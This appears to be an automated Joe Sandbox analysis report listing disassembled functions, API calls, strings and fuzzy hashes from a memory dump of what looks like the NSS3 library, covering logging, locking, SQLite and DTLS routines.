Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: DebugOutputPrintStringfflush$fwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
String ID: *pulCount = 0x%x$ pMechanismList = 0x%p$ pulCount = 0x%p$ slotID = 0x%x$C_GetMechanismList
API String ID: 1342304006-3652739913
Opcode ID: 159cd53d02ae2cd642fe8d0ed7f34718631acc78597cb0ef99f7a00c60fbccbc
Instruction ID: 914d4f174c551e5f3774ec7cd2698f8c2760836a53f02dfb565adfcbc9f4b4e8
Opcode Fuzzy Hash: 159cd53d02ae2cd642fe8d0ed7f34718631acc78597cb0ef99f7a00c60fbccbc
Instruction Fuzzy Hash: B921B272601149DFDF309F95EE8CA9D3771EB8231DF444475E81897B22E734A854CBA1

Function 6C850EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6C732357), ref: 6C850EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C732357), ref: 6C850EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C850EE6

Part of subcall function 6C8509D0: PR_Now.NSS3 ref: 6C850A22
Part of subcall function 6C8509D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C850A35
Part of subcall function 6C8509D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C850A66
Part of subcall function 6C8509D0: PR_GetCurrentThread.NSS3 ref: 6C850A70
Part of subcall function 6C8509D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C850A9D
Part of subcall function 6C8509D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C850AC8
Part of subcall function 6C8509D0: PR_vsmprintf.NSS3(?,?), ref: 6C850AE8
Part of subcall function 6C8509D0: EnterCriticalSection.KERNEL32(?), ref: 6C850B19
Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C850B48
Part of subcall function 6C8509D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C850C76
Part of subcall function 6C8509D0: PR_LogFlush.NSS3 ref: 6C850C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C850EFA

Part of subcall function 6C73AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C73AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C850F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C850F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C850F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C850F2B

Strings

Aborting, xrefs: 6C850EB3
Assertion failure: %s, at %s:%d, xrefs: 6C850ED9, 6C850EE5, 6C850F06, 6C850F0B

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: 9e23ed718a3dcc36496b30a405ac2e073a81d0eef3fd564af789a466a623cd47
Instruction ID: 0b60506ce3b23b9ccbe176c8b7a4e1df71e9f7635535f5c4b33276d815fc2207
Opcode Fuzzy Hash: 9e23ed718a3dcc36496b30a405ac2e073a81d0eef3fd564af789a466a623cd47
Instruction Fuzzy Hash: 5FF0A4F69001187BDE203F649D4AC9B3E2DDF42269F804434FD0956613DB76EA2496F2

Function 6C744FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6C890148,?,6C756FEC), ref: 6C74502A
PR_NewLock.NSS3(00000001,00000000,6C890148,?,6C756FEC), ref: 6C745034
PL_NewHashTable.NSS3(00000000,6C79FE80,6C79FD30,6C7EC350,00000000,00000000,00000001,00000000,6C890148,?,6C756FEC), ref: 6C745055
PL_NewHashTable.NSS3(00000000,6C79FE80,6C79FD30,6C7EC350,00000000,00000000,?,00000001,00000000,6C890148,?,6C756FEC), ref: 6C74506D

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: 96de933523be05fb867d4da6f048de468861a841ec210f76a550263bd8102d25
Instruction ID: c0e1c04aa9d5b8352837c18610c88e2ca674c98ffbc846cf619203ab825e9c2d
Opcode Fuzzy Hash: 96de933523be05fb867d4da6f048de468861a841ec210f76a550263bd8102d25
Instruction Fuzzy Hash: 7A31C6B5B092109BDB709AA6BA0C74F37B8B71336DF058135E90987A40D37DA404CBE1

Function 6C6E2E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6E2F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6C6E2FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6C6E3005
memcpy.VCRUNTIME140(?,?,?), ref: 6C6E30EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6E3131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6E3178

Strings

%s at line %d of [%.10s], xrefs: 6C6E3171
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6E3022, 6C6E3156, 6C6E3162, 6C6E318A, 6C6E3196, 6C6E31A2, 6C6E31AE, 6C6E31BA, 6C6E31C6
database corruption, xrefs: 6C6E316C

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: 25f38268b3b2f2987f8cb845270b27e5663fcafd99e61f6191f0b13c44ec941d
Instruction ID: 4ea354c0a43e234e57432b4f9ae5281e38934272dda7871e6e2d48df53ca1eca
Opcode Fuzzy Hash: 25f38268b3b2f2987f8cb845270b27e5663fcafd99e61f6191f0b13c44ec941d
Instruction Fuzzy Hash: E7B1B070E0A2199BCB18CF9DC885AEEB7B2BF4C304F14442EE855B7B51D7749941CBA8

Function 6C780C90 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C781444,?,00000001,?,00000000,00000000,?,?,6C781444,?,?,00000000,?,?), ref: 6C780CB3

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C781444,?,00000001,?,00000000,00000000,?,?,6C781444,?), ref: 6C780DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C781444,?,00000001,?,00000000,00000000,?,?,6C781444,?), ref: 6C780DEC

Part of subcall function 6C7A0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C742AF5,?,?,?,?,?,6C740A1B,00000000), ref: 6C7A0F1A
Part of subcall function 6C7A0F10: malloc.MOZGLUE(00000001), ref: 6C7A0F30
Part of subcall function 6C7A0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C7A0F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C781444,?,00000001,?,00000000,00000000,?), ref: 6C780DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C781444,?,00000001,?,00000000), ref: 6C780E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C781444,?,00000001,?,00000000,00000000,?), ref: 6C780E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C781444,?,00000001,?,00000000,00000000,?,?,6C781444,?,?,00000000), ref: 6C780E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C781444,?,00000001,?,00000000,00000000,?), ref: 6C780E79

Part of subcall function 6C791560: TlsGetValue.KERNEL32(00000000,?,6C760844,?), ref: 6C79157A
Part of subcall function 6C791560: EnterCriticalSection.KERNEL32(?,?,?,6C760844,?), ref: 6C79158F
Part of subcall function 6C791560: PR_Unlock.NSS3(?,?,?,?,6C760844,?), ref: 6C7915B2

Part of subcall function 6C75B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C761397,00000000,?,6C75CF93,5B5F5EC0,00000000,?,6C761397,?), ref: 6C75B1CB
Part of subcall function 6C75B1A0: free.MOZGLUE(5B5F5EC0,?,6C75CF93,5B5F5EC0,00000000,?,6C761397,?), ref: 6C75B1D2

Part of subcall function 6C7589E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C7588AE,-00000008), ref: 6C758A04
Part of subcall function 6C7589E0: EnterCriticalSection.KERNEL32(?), ref: 6C758A15
Part of subcall function 6C7589E0: memset.VCRUNTIME140(6C7588AE,00000000,00000132), ref: 6C758A27
Part of subcall function 6C7589E0: PR_Unlock.NSS3(?), ref: 6C758A35

Strings

/G6/, xrefs: 6C780C9F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID: /G6/
API String ID: 1601681851-570549270
Opcode ID: 93a21c68f102b64d2051b1962f02752166bed60e259a35f25f2130d919cf6410
Instruction ID: c09342a2b9ab40f459e27eea6c6248c76d64525f8d1bd7fc6d585fa0cec0533d
Opcode Fuzzy Hash: 93a21c68f102b64d2051b1962f02752166bed60e259a35f25f2130d919cf6410
Instruction Fuzzy Hash: 3C51C6B6E022005FEB109F65DE89AAB37A8AF0521CF150434ED1597B02EB31ED15C6B2

Function 6C78CA30 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C78CA95
EnterCriticalSection.KERNEL32(00000000), ref: 6C78CAA9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,00000000,?,6C78C8CF,?,?,?), ref: 6C78CAE7
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C78CB09
PK11_GetBlockSize.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?,6C78C8CF,?,?,?), ref: 6C78CB31

Part of subcall function 6C781490: PORT_Alloc_Util.NSS3(0000000C,?,?,?,?,6C78CB40,?,00000000), ref: 6C7814A1
Part of subcall function 6C781490: PORT_ZAlloc_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,6C78C8CF,?), ref: 6C7814C7
Part of subcall function 6C781490: memset.VCRUNTIME140(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7814E4
Part of subcall function 6C781490: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000), ref: 6C7814F5

PR_Unlock.NSS3(?), ref: 6C78CB97
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C78CBB2
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C78C8CF), ref: 6C78CBE2

Strings

/G6/, xrefs: 6C78CA3E

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: UnlockUtil$Alloc_$BlockCriticalEnterErrorItem_K11_SectionSizeValueZfreememcpymemset
String ID: /G6/
API String ID: 2753656479-570549270
Opcode ID: 0f3810be38a8dabf192b11f7ad64ff381af8e892e583d209da75fb24eb5fdd80
Instruction ID: d2605738ebd632e6c964b78efbe3fe9718c9f49b03ba81212270b15a87470e23
Opcode Fuzzy Hash: 0f3810be38a8dabf192b11f7ad64ff381af8e892e583d209da75fb24eb5fdd80
Instruction Fuzzy Hash: 88517F71E011099BDB00EFA8DA84AEEBBB8BF08319F144175E918A7701E735ED54CBA1

Function 6C7888E0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7888FC

Part of subcall function 6C79BE30: SECOID_FindOID_Util.NSS3(6C75311B,00000000,?,6C75311B,?), ref: 6C79BE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C788913

Part of subcall function 6C7A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7487ED,00000800,6C73EF74,00000000), ref: 6C7A1000
Part of subcall function 6C7A0FF0: PR_NewLock.NSS3(?,00000800,6C73EF74,00000000), ref: 6C7A1016
Part of subcall function 6C7A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7487ED,00000008,?,00000800,6C73EF74,00000000), ref: 6C7A102B

SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6C86D864,?), ref: 6C788947

Part of subcall function 6C79E200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6C79E245
Part of subcall function 6C79E200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C79E254

SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C78895B
DER_GetInteger_Util.NSS3(?), ref: 6C788973
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C788982
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7889EC
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C788A12

Strings

/G6/, xrefs: 6C7888F0

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Arena_Tag_$AlgorithmErrorFindFree$ArenaDecodeInitInteger_Item_LockPoolcalloc
String ID: /G6/
API String ID: 2145430656-570549270
Opcode ID: 0c58c91006598336663c5a07232a9e7041cd308933f016392653b6080cb614eb
Instruction ID: b65dde2927dd315892b2b5a837bd9ee8e72500fd6ef092d9ff67b4e8f1b1e9be
Opcode Fuzzy Hash: 0c58c91006598336663c5a07232a9e7041cd308933f016392653b6080cb614eb
Instruction Fuzzy Hash: 8E316FB1A0560097F72056396F497AA3A999F9132CF240B37DB19D7B81FB35C4468193

Function 6C7CEF30 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6C7EA4A1,?,00000000,?,00000001), ref: 6C7CEF6D

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

htonl.WSOCK32(00000000,?,6C7EA4A1,?,00000000,?,00000001), ref: 6C7CEFE4
htonl.WSOCK32(?,00000000,?,6C7EA4A1,?,00000000,?,00000001), ref: 6C7CEFF1
memcpy.VCRUNTIME140(?,?,6C7EA4A1,?,00000000,?,6C7EA4A1,?,00000000,?,00000001), ref: 6C7CF00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C7EA4A1,?,00000000,?,00000001), ref: 6C7CF027

Strings

dtls13, xrefs: 6C7CEF33
/G6/, xrefs: 6C7CEF42

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: /G6/$dtls13
API String ID: 242828995-3655569345
Opcode ID: bee55574566312ecd3663f247aa624ac37100386e1276e7fd73ada9617446a64
Instruction ID: d206e6ff8b2ddcb167b1260d6036ca2c5557312f88be04940de73fa5d80c6edb
Opcode Fuzzy Hash: bee55574566312ecd3663f247aa624ac37100386e1276e7fd73ada9617446a64
Instruction Fuzzy Hash: 7B312671B00216AFC750CF28CE81B9AB7E4EF49358F158439E8189B751E731E915CBE2

Function 6C73AB70 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 104pipeCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32(?,?,?,00000000), ref: 6C73ABAF
GetLastError.KERNEL32 ref: 6C73AC44
PR_SetError.NSS3(FFFFE896,00000000), ref: 6C73AC50

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

PR_SetError.NSS3(FFFFE890,00000000), ref: 6C73AC62
CloseHandle.KERNEL32(?), ref: 6C73AC75
CloseHandle.KERNEL32(?), ref: 6C73AC7A

Strings

/G6/, xrefs: 6C73AB79

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Error$CloseHandle$CreateLastPipeValue
String ID: /G6/
API String ID: 4247729451-570549270
Opcode ID: afec6d3bd8fa8a87be5a00c7f04ba8b6c3f7d3762e248d9f37c709e5cb3cbbc9
Instruction ID: 8f615f03f0d564d86d5e56f79b3f847d3916e5b8c14dd36243ce95553b735501
Opcode Fuzzy Hash: afec6d3bd8fa8a87be5a00c7f04ba8b6c3f7d3762e248d9f37c709e5cb3cbbc9
Instruction Fuzzy Hash: 5131A075A001149FDB14DFA8CD499AEBFF4FF8A318B258068D5099B362D7329C45CBE1

Function 6C74AF60 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C74AFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C869500,6C743F91), ref: 6C74AFD2

Part of subcall function 6C79B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8718D0,?), ref: 6C79B095

DER_GetInteger_Util.NSS3(?), ref: 6C74B007

Part of subcall function 6C796A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C741666,?,6C74B00C,?), ref: 6C796AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C74B02F
PR_CallOnce.NSS3(6C8A2AA4,6C7A12D0), ref: 6C74B046
PL_FreeArenaPool.NSS3 ref: 6C74B058
PL_FinishArenaPool.NSS3 ref: 6C74B060

Strings

security, xrefs: 6C74AFB8
/G6/, xrefs: 6C74AF6F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: /G6/$security
API String ID: 3627567351-2919133760
Opcode ID: ade9fbfaa86d2c7ca4a579520563a05cc07c48d7963bc0ffe192f2949f4ea051
Instruction ID: c43dd849eac84f6ff2c43fb2fcbebe01e7284ad122a9f9173d95cc31e8a3c885
Opcode Fuzzy Hash: ade9fbfaa86d2c7ca4a579520563a05cc07c48d7963bc0ffe192f2949f4ea051
Instruction Fuzzy Hash: 1A312C715043009BD7208F14DE48BAE77A4AF4636EF148729E8745BBE1E332AA09C797

Function 6C852AD0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 46stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C852AE8
strdup.MOZGLUE(00000000), ref: 6C852AFA
PR_ExitMonitor.NSS3 ref: 6C852B0B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(LD_LIBRARY_PATH), ref: 6C852B1E
strdup.MOZGLUE(.;\lib), ref: 6C852B32
PR_ExitMonitor.NSS3 ref: 6C852B4A
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C852B59

Strings

.;\lib, xrefs: 6C852B29, 6C852B31
LD_LIBRARY_PATH, xrefs: 6C852B19

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Monitor$Exitstrdup$EnterErrorgetenv
String ID: .;\lib$LD_LIBRARY_PATH
API String ID: 2438426442-3838498337
Opcode ID: c54c666d8a7a5774b47e0b41c80f726d108917f3e2bdae9a51090302633cbbe9
Instruction ID: 363d8b987670b9ff3189fe2271cfcf11e455c3e80c661feae336592d5992800b
Opcode Fuzzy Hash: c54c666d8a7a5774b47e0b41c80f726d108917f3e2bdae9a51090302633cbbe9
Instruction Fuzzy Hash: 8E01DBB9F40111A7DE716FA9BE0975A37B85B1125DF480530DC0AD1A22FB6ADC38C6D3

Function 6C7DAB00 Relevance: 15.3, APIs: 10, Instructions: 293memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7DA6D0: PORT_ZAlloc_Util.NSS3(00000A38,00000000,?,6C7D80C1), ref: 6C7DA6F9
Part of subcall function 6C7DA6D0: memcpy.VCRUNTIME140(00000210,6C8A0BEC,0000011C), ref: 6C7DA869

SECITEM_CopyItem_Util.NSS3(00000000,00000008,?,?,6C7D80AD), ref: 6C7DAB48

Part of subcall function 6C79FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C798D2D,?,00000000,?), ref: 6C79FB85
Part of subcall function 6C79FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C79FBB1

PORT_Strdup_Util.NSS3(?,?,?,?,?,6C7D80AD), ref: 6C7DAB8E
PORT_Strdup_Util.NSS3(?,?,?,?,?,6C7D80AD), ref: 6C7DABA7
